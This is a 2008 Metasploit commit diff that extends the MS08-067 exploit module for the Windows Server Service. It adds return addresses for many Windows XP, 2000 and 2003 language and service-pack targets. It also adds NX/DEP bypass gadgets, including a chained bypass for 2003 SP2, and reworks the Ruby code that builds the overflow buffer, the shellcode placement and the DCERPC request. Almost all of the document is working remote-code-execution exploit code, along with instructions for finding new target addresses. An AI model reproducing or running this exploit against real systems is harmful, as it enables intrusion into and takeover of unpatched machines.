Lots of new targets merged in for MS08-067 including Brett Moore's 2003 SP2 DEP bypass

git-svn-id: file:///home/svn/framework3/trunk@5812 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-10-31 05:16:02 +00:00
parent 08d296240a
commit 7fcf5b3dc2
1 changed files with 187 additions and 45 deletions

View File

@ -26,16 +26,17 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module exploits a parsing flaw in the path canonicalization code of
NetAPI32.dll through the Server Service. This module is capable of bypassing
DEP on some operating systems and service packs. The correct target must be
NX on some operating systems and service packs. The correct target must be
used to prevent the Server Service (along with a dozen others in the same
process) from crashing. Windows XP targets seem to handle multiple successful
exploitation events, but 2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module, full support for
DEP bypass on 2003, along with other platforms, is still in development.
NX bypass on 2003, along with other platforms, is still in development.
},
'Author' =>
[
'hdm' # with tons of input/help/testing from the community
'hdm', # with tons of input/help/testing from the community
'Brett Moore <brett.moore[at]insomniasec.com>'
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
@ -60,44 +61,128 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP2 English (DEP)',
#
# Antoine's universal for Windows 2000 with MS06-040 applied
# Use ms06_040_netapi for systems without this patch.
#
[ 'Windows 2000 MS06-040+ (YMMV pre MS06-040)',
{
'Ret' => 0x001f1cb0,
'Scratch' => 0x00020408,
}
], # JMP EDI Windows 2000 Universal
#
# Metasploit's NX bypass for XP SP2/SP3
#
[ 'Windows XP SP2 English (NX)',
{
'Ret' => 0x6f88f727,
'DisableNX' => 0x6F8916E2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 English (DEP)',
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Metasploit's NX bypass for XP SP2/SP3
# Target provided by Giorgio Casali <giorgio.casali[at]gmail.com>
#
[ 'Windows XP SP2 Italian (NX)',
{
'Ret' => 0x596bf727,
'DisableNX' => 0x596c16e2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Metasploit's NX bypass for XP SP2/SP3
# Target provided by Ulises2k <ulises2k[at]gmail.com>
#
[ 'Windows XP SP2 Spanish (NX)',
{
'Ret' => 0x6fdbf807,
'DisableNX' => 0x6fdc17c2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Metasploit's NX bypass for XP SP2/SP3
# Target provided by sunwear <shellcoder[at]hotmail.com>
#
[ 'Windows XP SP2 Chinese (NX)',
{
'Ret' => 0x58fcda43,
'DisableNX' => 0x58fc16e2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Metasploit's NX bypass for XP SP2/SP3
#
[ 'Windows XP SP3 English (NX)',
{
'Ret' => 0x6f88f807,
'DisableNX' => 0x6F8917C2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
[ 'Windows 2003 SP0 English (NO DEP)',
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Metasploit's NX bypass for XP SP2/SP3
# Target provided by Thierry Zoller <Thierry[at]zoller.lu>
#
[ 'Windows XP SP3 German (NX)',
{
'Ret' => 0x6fda2bef,
'DisableNX' => 0x6fda17c2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Standard return-to-ESI without NX bypass
#
[ 'Windows 2003 SP0 English (NO NX)',
{
'Ret' => 0x71bf175f,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
[ 'Windows 2003 SP2 English (NO DEP)',
#
# Standard return-to-ESI without NX bypass
#
[ 'Windows 2003 SP2 English (NO NX)',
{
'Ret' => 0x71bf3969,
'Scratch' => 0x00020408,
}
], # JMP ESI WS2HELP.DLL
#
# Brett Moore's crafty NX bypass for 2003 SP2
#
[ 'Windows 2003 SP2 English (NX)',
{
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
'Scratch' => 0x00020408,
}
]
#
# Missing Targets
# Key: T=TODO ?=UNKNOWN U=UNRELIABLE
#
# [T] Windows 2000 SP4 - Could not trigger with this vector (need a different call)
# [?] Windows XP SP0 - Could not trigger with this vector
# [?] Windows XP SP1 - Could not trigger with this vector
# [?] Windows 2003 SP1 - Could not trigger with this vector
# [T] Windows 2003 SP2 - Triggered but bypassing DEP requires more time
# [?] Windows Vista SP0 - Not tested yet
# [?] Windows Vista SP1 - Not tested yet
#
@ -119,16 +204,16 @@ class Metasploit3 < Msf::Exploit::Remote
*** WINDOWS XP SP2/SP3 TARGETS ***
This exploit bypasses DEP/NX by returning to a function call inside acgenral.dll that disables NX
This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
for the process and then returns back to a call ESI instruction. These addresses are different
between operating systems, service packs, and language packs, but the steps below can be used to
add new targets.
If the target system does not have NX/DEP, just place a "call ESI" return into both the Ret and
If the target system does not have NX/NX, just place a "call ESI" return into both the Ret and
DisableNX elements of the target hash.
If the target system does have NX/DEP, obtain a copy of the acgenral.dll from that system.
If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.
First obtain the value for the Ret element of the hash with the following command:
$ msfpescan -j esi acgenral.dll
@ -154,12 +239,12 @@ class Metasploit3 < Msf::Exploit::Remote
call ds:__imp__NtSetInformationProcess@16
*** WINDOWS XP/2000 NON-DEP TARGETS ***
*** WINDOWS XP NON-NX TARGETS ***
Instead of bypassing DEP, just return directly to a "JMP ESI", which takes us to the short
Instead of bypassing NX, just return directly to a "JMP ESI", which takes us to the short
jump, and finally the shellcode. XP SP0 and XP SP1 may require a different opnum to get
reliable code execution.
reliable code execution. O
*** WINDOWS 2003 SP2 TARGETS ***
@ -175,12 +260,14 @@ class Metasploit3 < Msf::Exploit::Remote
*** WINDOWS 2000 TARGETS ***
Currently untested, but should be reliable using opnum 0x23 (ala EMM / ph4ntom)
No NX to bypass, just return directly to a "JMP EDX", which takes us to the short
jump, and finally the shellcode. Systems without MS06-040 applied act differently
and should not be targeted with this exploit.
*** WINDOWS VISTA TARGETS ***
Currently untested, will involve ASLR and DEP, should be fun.
Currently untested, will involve ASLR and NX, should be fun.
*** NetprPathCanonicalize IDL ***
@ -219,40 +306,95 @@ class Metasploit3 < Msf::Exploit::Remote
end
prefix = "\\"
path = ""
server = Rex::Text.rand_text_alpha(rand(8)+1).upcase
jumper = Rex::Text.rand_text_alpha(70).upcase
jumper[ 4,4] = [target.ret].pack("V")
jumper[56,2] = make_nops(2)
jumper[58,2] = "\xeb\x62"
#
# Windows 2000, XP (NX), and 2003 (NO NX) targets
#
if(not target['RetDec'])
path =
Rex::Text.to_unicode("\\") +
jumper = Rex::Text.rand_text_alpha(70).upcase
jumper[ 4,4] = [target.ret].pack("V")
jumper[56,2] = make_nops(2)
jumper[58,2] = "\xeb\x62"
# This buffer is removed from the front
Rex::Text.rand_text_alpha(100) +
path =
Rex::Text.to_unicode("\\") +
# Shellcode
payload.encoded +
# This buffer is removed from the front
Rex::Text.rand_text_alpha(100) +
# Relative path to trigger the bug
Rex::Text.to_unicode("\\..\\..\\") +
# Shellcode
payload.encoded +
# Extra padding
Rex::Text.to_unicode(pad) +
# Relative path to trigger the bug
Rex::Text.to_unicode("\\..\\..\\") +
# Writable memory location (static)
[target['Scratch']].pack("V") + # EBP
# Extra padding
Rex::Text.to_unicode(pad) +
# Return to code which disables NX (or just the return)
[ target['DisableNX'] || target.ret ].pack("V") +
# Writable memory location (static)
[target['Scratch']].pack("V") + # EBP
# Padding with embedded jump
jumper +
# Return to code which disables NX (or just the return)
[ target['DisableNX'] || target.ret ].pack("V") +
# NULL termination
"\x00" * 2
# Padding with embedded jump
jumper +
# NULL termination
"\x00" * 2
#
# Windows 2003 SP2 (NX) targets
#
else
jumper = Rex::Text.rand_text_alpha(70).upcase
jumper[ 0,4] = [target['RetDec']].pack("V")# one more to Align and make room
jumper[ 4,4] = [target['RetDec']].pack("V") # 4 more for space
jumper[ 8,4] = [target['RetDec']].pack("V")
jumper[ 12,4] = [target['RetDec']].pack("V")
jumper[ 16,4] = [target['RetDec']].pack("V")
jumper[ 20,4] = [target['RetPop']].pack("V")# pop to EBP
jumper[ 24,4] = [target['DisableNX']].pack("V")
jumper[ 56,4] = [target['JmpESP']].pack("V")
jumper[ 60,4] = [target['JmpESP']].pack("V")
jumper[ 64,2] = "\xeb\x02" # our jump
jumper[ 68,2] = "\xeb\x62" # original
path =
Rex::Text.to_unicode("\\") +
# This buffer is removed from the front
Rex::Text.rand_text_alpha(100) +
# Shellcode
payload.encoded +
# Relative path to trigger the bug
Rex::Text.to_unicode("\\..\\..\\") +
# Extra padding
Rex::Text.to_unicode(pad) +
# Writable memory location (static)
[target['Scratch']].pack("V") + # EBP
# Return to code which disables NX (or just the return)
[target['RetDec']].pack("V") +
# Padding with embedded jump
jumper +
# NULL termination
"\x00" * 2
end
handle = dcerpc_handle(
'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
@ -267,7 +409,7 @@ class Metasploit3 < Msf::Exploit::Remote
NDR.uwstring(server) +
NDR.UnicodeConformantVaryingStringPreBuilt(path) +
NDR.long(rand(1024)) +
NDR.wstring("") +
NDR.wstring(prefix) +
NDR.long(4097) +
NDR.long(0)